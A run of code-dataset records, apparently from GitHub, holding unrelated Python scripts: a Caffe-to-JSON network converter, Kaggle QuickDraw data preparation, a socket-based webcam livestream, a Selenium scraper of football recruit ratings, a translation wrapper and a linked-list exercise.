caffe network definition protobuf file\") \n parser.add_argument(\"-s\", \"--solver\", type=str, required=False,\n help=\"input caffe solver definition protobuf file\") \n parser.add_argument(\"-o\", \"--outfile\", type=str, \n help=\"output soooa network definition json file\")\n parser.add_argument(\"--layerpropdef\", type=str, default=LAYER_PROP_DEF,\n help=\"output soooa network definition json file\")\n parser.add_argument(\"--networkpropdef\", type=str, default=NETWORK_PROP_DEF,\n help=\"output soooa network definition json file\")\n return parser.parse_args() \n\ndef preprocess_line(line):\n if line.startswith('#'):\n print('comment: skip')\n return ''\n\n splits = line.split('#')\n line = splits[0].strip()\n\n return line\n\ndef preprocess_lines(lines):\n lines_len = len(lines)\n\n for line_idx in reversed(xrange(lines_len)): \n line = lines[line_idx].strip()\n line = preprocess_line(line)\n if len(line) < 1:\n del lines[line_idx]\n else:\n lines[line_idx] = line\n\n\ndef get_line_type(line):\n line_type = None\n if line.endswith('{'):\n line_type = 'obj_head'\n elif line == '}':\n line_type = 'obj_tail'\n # 반드시 obj_field보다 먼저 처리해야 함.\n # 그렇지 않을 경우 inline obj가 obj_field로 걸림\n elif '{' in line and ':' in line and '}' in line:\n line_type = 'inline_obj'\n elif ':' in line:\n line_type = 'obj_field'\n else:\n line_type = 'unknown'\n\n return line_type\n\n\n\n# obj head에 대해서만!\n# field는 별도 처리 ...\ndef handle_obj_head(line, obj_stack):\n assert (len(obj_stack) > 0), \"obj_stack is empty.\"\n cur_obj = obj_stack[-1]\n\n obj_name = line.split('{')[0].strip()\n obj = OrderedDict()\n\n # obj가 repeated 타입인 경우\n if obj_name in list_item:\n if not obj_name in cur_obj:\n cur_obj[obj_name] = list()\n cur_obj[obj_name].append(obj)\n\n # obj가 repeated 타입이 아닌 경우 \n else:\n cur_obj[obj_name] = obj\n\n # 추가한 obj를 stack에 push\n obj_stack.append(obj)\n\n\ndef handle_obj_tail(line, obj_stack):\n assert (len(obj_stack) > 0), \"obj_stack is empty.\"\n\n obj_stack.pop()\n\n\n\ndef handle_obj_field(line, obj_stack):\n assert (len(obj_stack) > 0), \"obj_stack is empty.\"\n cur_obj = obj_stack[-1]\n\n splits = line.split(':')\n assert (len(splits) == 2), \"invalid obj_field line: {}\".format(line)\n\n field_name = splits[0].strip()\n field_value = splits[1].strip()\n field_value = field_value.replace('\\\"', '').replace('\\'', '')\n\n #assert (not field_name in cur_obj), \"field name duplicated: {}\".format(line)\n # obj가 repeated 타입인 경우\n if field_name in list_item:\n if not field_name in cur_obj:\n cur_obj[field_name] = list()\n cur_obj[field_name].append(field_value)\n\n # obj가 repeated 타입이 아닌 경우 \n else:\n cur_obj[field_name] = field_value\n\n\n\ndef handle_inline_obj(line, obj_stack):\n print(\"not handle inline obj currently... handle it manually: [{}]\".format(line))\n pass\n\ndef parse_layer(lines, cur_line, unhandled_lines):\n layer_start = False\n layer_end = False\n stack_size = 0\n\n obj_stack = list()\n layer_dict = OrderedDict()\n obj_stack.append(layer_dict)\n\n while not layer_end:\n line = lines[cur_line]\n #line = lines[cur_line].strip()\n cur_line += 1\n\n #print('cur line: [{}]'.format(line))\n #line = preprocess_line(line)\n #print('preprocessed: [{}]'.format(line))\n\n # ignores empty line\n #if len(line) < 1:\n # continue\n\n line_type = get_line_type(line)\n #print('line type: [{}]'.format(line_type))\n assert(line_type != 'unknown'), \"unknown line type ...: {}\".format(line)\n\n if not layer_start: \n if line_type == 'obj_head' and line.startswith('layer'):\n layer_start = True\n layer_dict.clear()\n continue\n elif line_type == 'obj_field':\n print('Network field ... skip')\n continue\n else:\n assert(False), \"invalid line->{}\".format(line)\n else:\n if line_type == 'obj_tail' and len(obj_stack) == 1:\n layer_start = False\n layer_end = True\n continue\n elif line_type == 'obj_head' and line.startswith('layer'):\n assert(False), \"invalid line->{}\".format(line)\n\n # layer obj가 시작하지 않았을 경우 이쪽으로 무조건 내려오지 않음\n # layer obj가 시작했을 경우 layer obj의 끝을 만난 경우가 아니면 항상 내려옴\n # layer obj의 content를 아래에서 처리 \n\n # layer object head has been filtered already\n # 이 경우 항상 layer inner obj head\n if line_type == 'obj_head':\n handle_obj_head(line, obj_stack)\n # 이 경우 항상 layer inner obj tail\n elif line_type == 'obj_tail':\n handle_obj_tail(line, obj_stack)\n elif line_type == 'obj_field':\n handle_obj_field(line, obj_stack)\n elif line_type == 'inline_obj':\n #handle_inline_obj(line, obj_stack)\n unhandled_lines.append(cur_line - 1)\n\n #print('------------------------------------')\n\n\n assert (len(obj_stack) == 1), \"obj stack should only contain layer obj\"\n return cur_line, obj_stack[0]\n\n\ndef convert(layer_id, layer_obj, depth_level, outfile, last_layer):\n type = layer_obj['type']\n\n if type in skip_layers:\n print('Skips [{}] layer ... '.format(type))\n return\n assert (type in layer_handler_dict), \"handler for type {} is not implemented\".format(type)\n \n out_file(OBJ_START, depth_level, outfile)\n depth_level += 1\n\n depth_keys = list()\n get_depth_keys(layer_obj, None, depth_keys)\n\n #for depth_key in depth_keys:\n # print(depth_key)\n common_handler(layer_id, layer_obj, depth_keys, depth_level, outfile)\n layer_handler_dict[type](layer_obj, depth_keys, depth_level, outfile)\n\n\n depth_level -= 1\n if not last_layer:\n out_file(OBJ_END + ',\\n', depth_level, outfile)\n else:\n out_file(OBJ_END + '\\n', depth_level, outfile)\n\n\n\n\n\ndef parse_solver(solver_path, depth_level, outfile):\n solverfile = open(solver_path, 'rb')\n lines = solverfile.readlines()\n solverfile.close()\n\n preprocess_lines(lines) \n\n\n\n last_line = False\n lines_len = len(lines)\n for line_idx in xrange(lines_len):\n line = lines[line_idx]\n if line_idx == lines_len - 1:\n last_line = True\n\n splits = line.split(':')\n assert (len(splits) == 2), \"invalid obj_field line: {}\".format(line)\n\n field_name = splits[0].strip()\n field_value = splits[1].strip()\n value = field_value.replace('\\\"', '').replace('\\'', '')\n\n if not field_name in solver_dict:\n print(\"unknown solver field {} ... skip ...\".format(field_name))\n continue\n \n key = solver_dict[field_name]\n\n\n\n\n line = '\\\"' + key + '\\\" : ' \n\n prop_type = 'str'\n if key != 'layer':\n assert(key in network_prop), \"solver field [{}] is not in network_prop\".format(key)\n prop_type = network_prop[key]\n\n if prop_type == 'float':\n value = str(value)\n if not \".\" in value:\n value += \".0\"\n line += value\n elif prop_type == 'int' or prop_type == 'float' or prop_type == 'bool':\n line += str(value)\n elif prop_type == 'std::vector':\n line += '['\n value_len = len(value)\n for i in range(value_len):\n line += '\\\"' + value[i] + '\\\"'\n if i < value_len -1:\n line += ', '\n line += ']'\n else:\n line += '\\\"' + value + '\\\"' \n\n if not last_line:\n line += ','\n\n out_file(line, depth_level, outfile)\n\n\n \n \ndef main(): \n \"\"\"Create the model and start the training.\"\"\" \n args = get_arguments() \n\n infile_path = args.infile\n solver_path = args.solver\n outfile_path = args.outfile \n layerpropdef_path = args.layerpropdef\n networkpropdef_path = args.networkpropdef\n\n has_solver = (solver_path != None)\n\n\n #f = open('inception_v3.prototxt', 'rb')\n infile = open(infile_path, 'rb')\n lines = infile.readlines()\n infile.close()\n \n parse_layer_prop_def(layerpropdef_path)\n\n #if os.path.exists(outfile_path):\n # os.remove(outfile_path)\n outfile = open(outfile_path, 'w')\n depth_level = 0\n\n out_file(OBJ_START, depth_level, outfile)\n depth_level += 1\n out_file(gen_key_line('layers'), depth_level, outfile)\n out_file(LIST_START, depth_level, outfile)\n depth_level += 1\n\n unhandled_lines = list()\n\n preprocess_lines(lines)\n num_lines = len(lines)\n\n cur_line = 0\n layer_id = 0\n\n first_layer = True\n last_layer = False\n while cur_line < num_lines:\n cur_line, layer_obj = parse_layer(lines, cur_line, unhandled_lines)\n #print(layer_obj)\n\n if first_layer:\n if 'Input' != layer_obj['type'] or 'Data' != layer_obj['type']:\n layer_id += 10\n first_layer = False\n\n if cur_line == num_lines:\n last_layer = True\n\n convert(layer_id, layer_obj, depth_level, outfile, last_layer)\n layer_id += 10\n\n \n depth_level -= 1\n out_file(LIST_END + \",\\n\", depth_level, outfile)\n\n\n out_file(gen_key_line('configs'), depth_level, outfile)\n out_file(OBJ_START, depth_level, outfile)\n depth_level += 1\n\n\n\n if has_solver:\n parse_network_prop_def(networkpropdef_path)\n parse_solver(solver_path, depth_level, outfile) \n\n\n\n\n\n\n depth_level -= 1\n out_file(OBJ_END, depth_level, outfile)\n\n depth_level -= 1\n out_file(OBJ_END, depth_level, outfile)\n\n outfile.close()\n\n print('unhandled lines:')\n for ln in unhandled_lines:\n print(ln)\n\n\n\n\n\n \nif __name__ == '__main__': \n main() \n","repo_name":"oopsoopskeke/LaonSillv2","sub_path":"LaonSill/scripts/networkdef/caffe2laonsill.py","file_name":"caffe2laonsill.py","file_ext":"py","file_size_in_byte":37407,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"78"} +{"seq_id":"14161396824","text":"import glob\nimport math\nimport os\nimport shutil\nfrom multiprocessing import Pool\n\nimport h5py\nimport numpy as np\nimport pandas as pd\n\nfrom utils import draw_strokes, read_lines, flatten_strokes, flatten_stroke_lens\n\n\ndef calculate_total_data_size():\n categories = read_lines(\"/storage/kaggle/quickdraw/categories.txt\")\n\n size = 0\n for category in categories:\n csv_file_name = \"/storage/kaggle/quickdraw/train_simplified_shard_0/{}-0.csv\".format(category)\n\n with open(csv_file_name) as csv_file:\n size += sum(1 for _ in csv_file) - 1\n\n print(\"total data size: {}\".format(size))\n return size\n\n\ndef prepare_strokes_pandas():\n categories = read_lines(\"/storage/kaggle/quickdraw/categories.txt\")\n\n for category in categories:\n csv_file_name = \"/storage/kaggle/quickdraw/train_simplified_shard_0/{}-0.csv\".format(category)\n\n print(\"processing file '{}'\".format(csv_file_name), flush=True)\n\n df = pd.read_csv(\n csv_file_name,\n index_col=\"key_id\",\n usecols=[\"key_id\", \"drawing\", \"word\"],\n converters={\n \"word\": lambda word: categories.index(word),\n \"drawing\": lambda drawing: eval(drawing)\n })\n\n df = df.rename(columns={\"word\": \"category\"})\n\n df.to_hdf(\"quickdraw_train_pd.hdf5\", key=category)\n\n shutil.move(\"quickdraw_train_pd.hdf5\", \"/storage/kaggle/quickdraw/quickdraw_train_pd.hdf5\")\n\n\ndef prepare_strokes():\n categories = read_lines(\"/storage/kaggle/quickdraw/categories.txt\")\n\n with h5py.File(\"quickdraw_train.hdf5\", \"w\", libver=\"latest\") as data_file:\n data_size = calculate_total_data_size()\n\n key_id_ds = data_file.create_dataset(\"key_id\", (data_size,), dtype=np.int64)\n category_ds = data_file.create_dataset(\"category\", (data_size,), dtype=np.int16)\n stroke_x_ds = data_file.create_dataset(\"stroke_x\", (data_size,), dtype=h5py.special_dtype(vlen=np.uint8))\n stroke_y_ds = data_file.create_dataset(\"stroke_y\", (data_size,), dtype=h5py.special_dtype(vlen=np.uint8))\n stroke_len_ds = data_file.create_dataset(\"stroke_len\", (data_size,), dtype=h5py.special_dtype(vlen=np.uint32))\n\n offset = 0\n\n for category in categories:\n csv_file_name = \"/storage/kaggle/quickdraw/train_simplified_shard_0/{}-0.csv\".format(category)\n\n print(\"processing file '{}'\".format(csv_file_name), flush=True)\n\n df = pd.read_csv(\n csv_file_name,\n index_col=\"key_id\",\n usecols=[\"key_id\", \"drawing\", \"word\"],\n converters={\"drawing\": lambda drawing: eval(drawing)})\n\n key_id_ds[offset:offset + len(df)] = df.index.values\n category_ds[offset:offset + len(df)] = [categories.index(word) for word in df.word]\n stroke_x_ds[offset:offset + len(df)] = [flatten_strokes(d, 0) for d in df.drawing]\n stroke_y_ds[offset:offset + len(df)] = [flatten_strokes(d, 1) for d in df.drawing]\n stroke_len_ds[offset:offset + len(df)] = [flatten_stroke_lens(d) for d in df.drawing]\n\n offset += len(df)\n\n print(\"wrote {} data elements\".format(offset))\n\n shutil.move(\"quickdraw_train.hdf5\", \"/storage/kaggle/quickdraw/quickdraw_train.hdf5\")\n\n\ndef prepare_thumbnails():\n categories = read_lines(\"/storage/kaggle/quickdraw/categories.txt\")\n\n with h5py.File(\"quickdraw_train_thumbnails.hdf5\", \"w\", libver=\"latest\") as data_file:\n for category in categories:\n csv_file_name = \"/storage/kaggle/quickdraw/train_simplified_shard_0/{}-0.csv\".format(category)\n\n print(\"processing file '{}'\".format(csv_file_name), flush=True)\n\n df = pd.read_csv(\n csv_file_name,\n index_col=\"key_id\",\n usecols=[\"key_id\", \"drawing\", \"word\"],\n converters={\"drawing\": lambda drawing: draw_strokes(eval(drawing), size=32)})\n\n thumbnail = np.stack(df.drawing.values)\n\n group = data_file.create_group(category)\n group[\"thumbnail\"] = thumbnail\n group[\"category\"] = [categories.index(word) for word in df.word]\n\n shutil.move(\"quickdraw_train_thumbnails.hdf5\", \"/storage/kaggle/quickdraw/quickdraw_train_thumbnails.hdf5\")\n\n\ndef prepare_shards():\n num_shards = 50\n\n if os.path.isdir(\"/storage/kaggle/quickdraw/train_simplified_shards\"):\n shutil.rmtree(\"/storage/kaggle/quickdraw/train_simplified_shards\")\n os.makedirs(\"/storage/kaggle/quickdraw/train_simplified_shards\")\n\n categories = read_lines(\"/storage/kaggle/quickdraw/categories.txt\")\n\n for category in categories:\n csv_file_name = \"/storage/kaggle/quickdraw/train_simplified/{}.csv\".format(category)\n\n print(\"processing file '{}'\".format(csv_file_name), flush=True)\n\n df = pd.read_csv(csv_file_name, index_col=\"key_id\")\n\n shard_size = math.ceil(len(df) / num_shards)\n indexes = df.index.values\n np.random.shuffle(indexes)\n\n for s in range(num_shards):\n start = s * shard_size\n end = min(start + shard_size, len(df))\n shard_df = df[df.index.isin(indexes[start:end])]\n shard_file_name = \"/storage/kaggle/quickdraw/train_simplified_shards/shard-{}.csv\".format(s)\n write_csv_header = not os.path.isfile(shard_file_name)\n with open(shard_file_name, \"a\") as shard_file:\n shard_df.to_csv(shard_file, header=write_csv_header)\n\n\ndef csv_to_npz(csv_file_name):\n print(\"reading file '{}'\".format(csv_file_name), flush=True)\n\n categories = read_lines(\"/storage/kaggle/quickdraw/categories.txt\")\n\n df = pd.read_csv(\n csv_file_name,\n index_col=\"key_id\",\n converters={\n \"word\": lambda word: categories.index(word),\n \"drawing\": lambda drawing: np.array(eval(drawing))\n })\n\n df = df.rename(columns={\"word\": \"category\"})\n\n key_id = np.array(df.index.values, dtype=np.int64)\n drawing = np.array(df.drawing.values, dtype=np.object)\n category = np.array(df.category.values, dtype=np.int16)\n recognized = np.array(df.recognized.values, dtype=np.bool)\n countrycode = np.array(df.countrycode.values, dtype=np.object)\n\n npz_file_name = csv_file_name[:-4] + \".npz\"\n print(\"writing file '{}'\".format(npz_file_name), flush=True)\n np.savez_compressed(\n npz_file_name,\n key_id=key_id,\n drawing=drawing,\n category=category,\n recognized=recognized,\n countrycode=countrycode)\n\n return None\n\n\ndef convert_csv_to_npz():\n csv_file_names = glob.glob(\"/storage/kaggle/quickdraw/train_simplified_shards/*.csv\")\n\n with Pool(5) as pool:\n pool.map(csv_to_npz, csv_file_names)\n\n\ndef draw_image(data_file_name):\n print(\"reading file '{}'\".format(data_file_name), flush=True)\n\n data = np.load(data_file_name)\n data_drawing = data[\"drawing\"]\n data_image = np.array([draw_strokes(drawing, size=128) for drawing in data_drawing], dtype=np.uint8)\n\n image_file_name = data_file_name[:-4] + \"-img128.npy\"\n print(\"writing file '{}'\".format(image_file_name), flush=True)\n np.savez(image_file_name, image=data_image)\n\ndef draw_images():\n data_file_names = glob.glob(\"/storage/kaggle/quickdraw/train_simplified_shards/shard-0.npz\")\n\n with Pool(5) as pool:\n pool.map(draw_image, data_file_names)\n\n\nif __name__ == \"__main__\":\n draw_images()\n","repo_name":"maxliaops/kaggle-quickdraw","sub_path":"prepare_data.py","file_name":"prepare_data.py","file_ext":"py","file_size_in_byte":7438,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"11881194111","text":"# These program transfer and recieve data simultaneously (client as well as server)\n# in the send function put details of yur system ip port to create socket \n\nimport socket,cv2,pickle,struct,threading # importing necessary libraries\n\ndef send():\n\n server_socket = socket.socket(socket.AF_INET,socket.SOCK_STREAM)\n my_ip = '192.168.43.131'\n my_port = 9999\n socket_address = (my_ip,my_port)\n\n server_socket.bind(socket_address)\n\n server_socket.listen(5)\n print(\"System listening to form CONNECTION on : \",socket_address , \" <<<<<<< your system\")\n\n\n while True:\n client_socket,addr = server_socket.accept()\n print('CONNECTED WITH >>>>> ',addr, \" <<<<< other systems address\")\n if client_socket:\n vid = cv2.VideoCapture(0)\n \n while(vid.isOpened()):\n img,frame = vid.read()\n a = pickle.dumps(frame)\n message = struct.pack(\"Q\",len(a))+a\n client_socket.sendall(message)\n \n cv2.imshow('>>>>>>>>>>> ANUJ GUPTA <<<<<<<<<<<<',frame)\n key = cv2.waitKey(1) & 0xFF\n if key ==ord('q'):\n client_socket.close()\n\n\n#-----------------------------------------------------------------------------------------------------------------------------------------------------------\n\n\ndef recieve():\n client_socket = socket.socket(socket.AF_INET,socket.SOCK_STREAM)\n host_ip = '192.168.43.26'\n port = 9999\n client_socket.connect((host_ip,port))\n data = b\"\"\n payload_size = struct.calcsize(\"Q\")\n while True:\n while len(data) < payload_size:\n packet = client_socket.recv(4096)\n if not packet: break\n data+=packet\n packed_msg_size = data[:payload_size]\n data = data[payload_size:]\n msg_size = struct.unpack(\"Q\",packed_msg_size)[0]\n \n while len(data) < msg_size:\n data += client_socket.recv(4096)\n frame_data = data[:msg_size]\n data = data[msg_size:]\n frame = pickle.loads(frame_data)\n cv2.imshow(\">>>>>>>>>>>>> NITESH GUPTA CALL ( ( ( CONNECTED ) ) ) <<<<<<<<<<<<\",frame)\n key = cv2.waitKey(1) & 0xFF\n if key == ord('q'):\n break\n client_socket.close()\n\n# implementing multi threading for both side connection (( sending and recieving at the same time ))\n\nsend123=threading.Thread(target=send)\nrecieve123=threading.Thread(target=recieve)\n\nsend123.start()\nrecieve123.start()","repo_name":"anujgupta09/LIVE_STREAM_VIDEO_APP_CV2_ST_ARTH","sub_path":"livestream.py","file_name":"livestream.py","file_ext":"py","file_size_in_byte":2424,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"4182618552","text":"import requests\r\nimport json\r\nimport pandas\r\nimport datetime\r\nimport selenium\r\nfrom selenium import webdriver\r\nfrom selenium.common.exceptions import NoSuchElementException\r\nfrom selenium.webdriver.chrome.options import Options\r\noptions = Options()\r\noptions.add_argument('--headless=new')\r\noptions.add_argument('--disable-gpu')\r\n\r\ndef fillList(lst,deslength):\r\n if(len(lst)!=deslength):\r\n lst.insert(0,\"-\")\r\n fillList(lst,deslength)\r\n else:\r\n return lst\r\n\r\n\r\n#define Player class\r\nclass Player:\r\n def __init__(self,name,ratingon3,rating247,ratingespn,ratingrivals,position,city,state,committed,team = False):\r\n try: ratingon3=int(ratingon3)\r\n except: pass\r\n try: rating247=int(rating247)\r\n except: pass\r\n try: ratingespn=int(ratingespn)\r\n except: pass\r\n try: ratingrivals=float(ratingrivals)\r\n except: pass\r\n self.name = name\r\n self.ron3 = [ratingon3]\r\n self.r247 = [rating247]\r\n self.respn = [ratingespn]\r\n self.rrivals = [ratingrivals]\r\n self.position = position\r\n self.city = city\r\n self.state = state\r\n self.committed = committed\r\n self.team = team\r\n def __str__(self):\r\n if self.committed == True:\r\n ret_format = \"{}: Ratings - On3:{}, 247:{}, ESPN:{}, Rivals:{}\\nPos: {}, City: {}, State: {}\\n{} commit\"\r\n return ret_format.format(self.name,self.ron3,self.r247,self.respn,self.rrivals,self.position,self.city,self.state,self.team)\r\n else:\r\n ret_format = \"{}: Ratings - On3:{}, 247:{}, ESPN:{}, Rivals:{}\\nPos: {}, City: {}, State: {}\"\r\n return ret_format.format(self.name,self.ron3,self.r247,self.respn,self.rrivals,self.position,self.city,self.state)\r\n\r\n\r\ndef webscrape(results,nameandcities,dates):\r\n #bring in webscraper, to get today's data\r\n dates+=[datetime.date.today()]\r\n printres=[]\r\n for y in range (1,21):\r\n url = 'https://www.on3.com/db/rankings/industry-comparison/football/2024/?page='+str(y)\r\n browser = webdriver.Chrome(options=options)\r\n browser.get(url)\r\n for x in range (0,50):\r\n try:\r\n xpath_name = '/html/body/div[1]/div[1]/section/main/section/section/ul/li[' + str(1+x) + ']/div[1]/div[1]/div/a'\r\n xpath_on3 = \"/html/body/div[1]/div[1]/section/main/section/section/ul/li[\" + str(1+x) + \"]/div[2]/div[1]/a/div[1]/div[2]/div/span[2]/span\"\r\n xpath_247 = \"/html/body/div[1]/div[1]/section/main/section/section/ul/li[\" + str(1+x) + \"]/div[2]/div[2]/a/div[1]/div[2]/div/span[2]/span\"\r\n xpath_espn = \"/html/body/div[1]/div[1]/section/main/section/section/ul/li[\" + str(1+x) + \"]/div[2]/div[3]/a/div[1]/div[2]/div/span[2]/span\"\r\n xpath_rivals = \"/html/body/div[1]/div[1]/section/main/section/section/ul/li[\" + str(1+x) + \"]/div[2]/div[4]/a/div[1]/div[2]/div/span[2]/span\"\r\n xpath_pos = \"/html/body/div[1]/div[1]/section/main/section/section/ul/li[\"+ str(1+x) +\"]/div[1]/div[1]/p[1]/span[1]\"\r\n xpath_city = \"/html/body/div[1]/div[1]/section/main/section/section/ul/li[\"+ str(1+x) +\"]/div[1]/div[1]/p[2]/span[2]\"\r\n xpath_state = \"/html/body/div[1]/div[1]/section/main/section/section/ul/li[\"+ str(1+x) +\"]/div[1]/div[1]/p[2]/span[2]\"\r\n xpath_committed = \"/html/body/div[1]/div[1]/section/main/section/section/ul/li[\" + str(1+x) + \"]/div[3]/div/a\"\r\n name = browser.find_element(\"xpath\", xpath_name).text\r\n try:\r\n ron3 = browser.find_element(\"xpath\", xpath_on3).text\r\n except:\r\n try:\r\n xpath_on3 = \"/html/body/div/div[1]/section/main/section/section/ul/li[\" + str(1+x) + \"]/div[2]/div[1]/a/div[1]/div[2]/div/span[2]/span\"\r\n ron3 = browser.find_element(\"xpath\", xpath_on3).text\r\n except:\r\n try:\r\n xpath_on3 = \"/html/body/div[1]/div[1]/section/main/section/section/ul/li[\" + str(1+x) + \"]/div[2]/div[1]/a/div[3]/h6[1]\"\r\n ron3 = browser.find_element(\"xpath\", xpath_on3).text\r\n except:\r\n try:\r\n xpath_on3 = \"/html/body/div[1]/div[1]/section/main/section/section/ul/li[\" + str(1+x) + \"]/div[2]/div[1]/div/div[3]/h6[1]\"\r\n ron3 = browser.find_element(\"xpath\", xpath_on3).text\r\n except: \r\n ron3 = \"-\"\r\n if ron3 != \"-\":\r\n ron3 = int(ron3)\r\n try:\r\n r247 = browser.find_element(\"xpath\", xpath_247).text\r\n except:\r\n try:\r\n xpath_247 = \"/html/body/div/div[1]/section/main/section/section/ul/li[\" + str(1+x) + \"]/div[2]/div[2]/a/div[1]/div[2]/div/span[2]/span\"\r\n r247 = browser.find_element(\"xpath\", xpath_247).text\r\n except:\r\n try:\r\n xpath_247 = \"/html/body/div[1]/div[1]/section/main/section/section/ul/li[\" + str(1+x) + \"]/div[2]/div[2]/a/div[3]/h6[1]\"\r\n r247 = browser.find_element(\"xpath\", xpath_247).text\r\n except:\r\n try:\r\n xpath_247 = \"/html/body/div[1]/div[1]/section/main/section/section/ul/li[\" + str(1+x) + \"]/div[2]/div[2]/div/div[3]/h6[1]\"\r\n r247 = browser.find_element(\"xpath\", xpath_247).text\r\n except: \r\n r247 = \"-\"\r\n if r247 != \"-\":\r\n r247 = int(r247)\r\n try:\r\n respn = browser.find_element(\"xpath\", xpath_espn).text\r\n except:\r\n try:\r\n xpath_espn = \"/html/body/div/div[1]/section/main/section/section/ul/li[\" + str(1+x) + \"]/div[2]/div[3]/div/div[1]/div[2]/div/span[2]/span\"\r\n respn = browser.find_element(\"xpath\", xpath_espn).text \r\n except:\r\n try:\r\n xpath_espn = \"/html/body/div/div[1]/section/main/section/section/ul/li[\" + str(1+x) + \"]/div[2]/div[3]/a/div[3]/h6[1]\"\r\n respn = browser.find_element(\"xpath\", xpath_espn).text \r\n except:\r\n try:\r\n xpath_espn = \"/html/body/div[1]/div[1]/section/main/section/section/ul/li[\" + str(1+x) + \"]/div[2]/div[3]/div/div[3]/h6[1]\"\r\n respn = browser.find_element(\"xpath\",xpath_espn).text\r\n except: \r\n respn = \"-\"\r\n if respn != \"-\":\r\n respn = int(respn)\r\n try:\r\n rrivals = browser.find_element(\"xpath\", xpath_rivals).text\r\n except:\r\n try:\r\n xpath_rivals = \"/html/body/div/div[1]/section/main/section/section/ul/li[\" + str(1+x) + \"]/div[2]/div[4]/a/div[1]/div[2]/div/span[2]/span\"\r\n rrivals = browser.find_element(\"xpath\", xpath_rivals).text\r\n except:\r\n try:\r\n xpath_rivals = \"/html/body/div[1]/div[1]/section/main/section/section/ul/li[\" + str(1+x) + \"]/div[2]/div[4]/a/div[3]/h6[1]\"\r\n rrivals = browser.find_element(\"xpath\", xpath_rivals).text\r\n except:\r\n try:\r\n xpath_rivals = \"/html/body/div[1]/div[1]/section/main/section/section/ul/li[\" + str(1+x) + \"]/div[2]/div[4]/div/div[3]/h6[1]\"\r\n rrivals = browser.find_element(\"xpath\", xpath_rivals).text\r\n except: \r\n rrivals = \"-\"\r\n if rrivals != \"-\":\r\n rrivals = float(rrivals)\r\n pos = browser.find_element(\"xpath\", xpath_pos).text\r\n city_state = browser.find_element(\"xpath\", xpath_city).text\r\n try:\r\n committed = browser.find_element(\"xpath\",xpath_committed).text\r\n if committed[:11] == \"HARD COMMIT\":\r\n committed = True\r\n team = browser.find_element(\"xpath\",xpath_committed).get_attribute('href')\r\n team = \" \".join(str(team).split(\"/\")[4].split(\"-\")).title()\r\n else:\r\n committed = False\r\n team = False\r\n except:\r\n committed = False\r\n team = False\r\n addPlayer(name,ron3,r247,respn,rrivals,pos,city_state[:-4],city_state[-2:],committed,team,results,nameandcities)\r\n p1 = Player(name,ron3,r247,respn,rrivals,pos,city_state[:-4],city_state[-2:],committed,team)\r\n printres+=[p1]\r\n file = open(dtFormat(datetime.date.today())+\"_RecruitData_Cl24.txt\",\"w\")\r\n file.write(\"Name\\tOn3 Rating\\t247 Rating\\tESPN Rating\\tRivals Rating\\tPosition\\tCity\\tState\\tCommit Status\\tCommit Team\\n\")\r\n for printr in printres:\r\n file.write(printr.name+\"\\t\"+str(printr.ron3)+\"\\t\"+str(printr.r247)+\"\\t\"+str(printr.respn)+\"\\t\"+str(printr.rrivals)+\"\\t\"+printr.position+\"\\t\"+printr.city+\"\\t\"+printr.state+\"\\t\"+str(printr.committed)+\"\\t\"+str(printr.team)+\"\\t\"+\"\\n\")\r\n except:\r\n print(\"Nothing at player #\",x+y*50-49)\r\n pass\r\n browser.close()\r\n #outwrite this webscraper data into a new file\r\n\r\ndef dtFormat(date):\r\n stri=str(date.year)+\"-\"+str(date.month)+\"-\"+str(date.day)\r\n return stri \r\n\r\ndef addPlayer(name,ron3,r247,respn,rrivals,pos,city,state,committed,team,results,nameandcities):\r\n if ron3!=\"-\": ron3 = int(ron3)\r\n if r247!=\"-\": r247 = int(r247)\r\n if respn!=\"-\": respn = int(respn)\r\n if rrivals!=\"-\": rrivals = float(rrivals)\r\n player = Player(name,ron3,r247,respn,rrivals,pos,city,state,committed,team)\r\n if (name,city) in nameandcities:\r\n results[nameandcities.index((name,city))].ron3+=[ron3]\r\n results[nameandcities.index((name,city))].r247+=[r247]\r\n results[nameandcities.index((name,city))].respn+=[respn]\r\n results[nameandcities.index((name,city))].rrivals+=[rrivals]\r\n else:\r\n nameandcities+=[(name,city)]\r\n results+=[player]\r\n\r\n#first, bring in all previous results\r\n\r\nresults = []\r\nnameandcities = []\r\nstartdate = datetime.date(2023,6,7)\r\ndates=[]\r\nx=0\r\nwhile (startdate+datetime.timedelta(days=x) List[str]:\n src_shards = self._batch(sentences, self.opt.batch_size)\n\n results = []\n for i, src_shard in enumerate(src_shards):\n self.logger.info(\"Translating shard %d.\" % i)\n src_encoded_shard = self.spp.encode(src_shard, out_type=str)\n scores, encoded_sentences = self.translator.translate(src=src_encoded_shard, batch_size=self.opt.batch_size, batch_type=self.opt.batch_type)\n results.extend([self.spp.decode(sent_list[0].split(' ')) for sent_list in encoded_sentences])\n \n return results\n\n\ndef get_translator(model_path: str, sp_model_path: str, batch_size: int = 1) -> TranslatorWrapper:\n parser = _get_parser()\n\n # the '-src' flag is required but we won't be using it\n opt = parser.parse_args([\n '--model', model_path,\n '--src', '',\n '--batch_size', f'{batch_size}',\n '--batch_type', 'sents',\n '--gpu', '0' if torch.cuda.is_available() else '-1'])\n\n return TranslatorWrapper(opt, sp_model_path)\n","repo_name":"attilanagy234/TreeSwap","sub_path":"src/hu_nmt/data_augmentator/translate/translate.py","file_name":"translate.py","file_ext":"py","file_size_in_byte":2214,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"78"} +{"seq_id":"30386110242","text":"# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, val=0, next=None):\n# self.val = val\n# self.next = next\nclass Solution:\n \n# def addTwoNumbers(self, l1: Optional[ListNode], l2: Optional[ListNode]) -> Optional[ListNode]:\n# p1 = l1\n# p2 = l2\n# carry = 0\n \n# while p1 or carry:\n \n# s = p1.val + (0 if p2 is None else p2.val) + carry\n \n# p1.val = s%10\n# carry = s//10\n \n# if (p1.next is None):\n \n# if p2 is None: #### L1 was longer & we are at the last node of L1\n# if carry > 0:\n# p1.next = ListNode(carry)\n# break\n# elif p2 is not None and p2.next is None: #### L1 & L2 are equal in length & we are at the last Node\n# if carry > 0:\n# p1.next = ListNode(carry)\n# break\n# else: #### L2 was longer & we are at the last node of L1\n# #### (p1.next is None) and (p2 is not None) and (p2.next is not None):\n# p1.next = p2.next\n# p2.next = None\n \n# p1 = p1.next\n# p2 = None if p2 is None else p2.next\n \n# return l1\n \n \n \n def 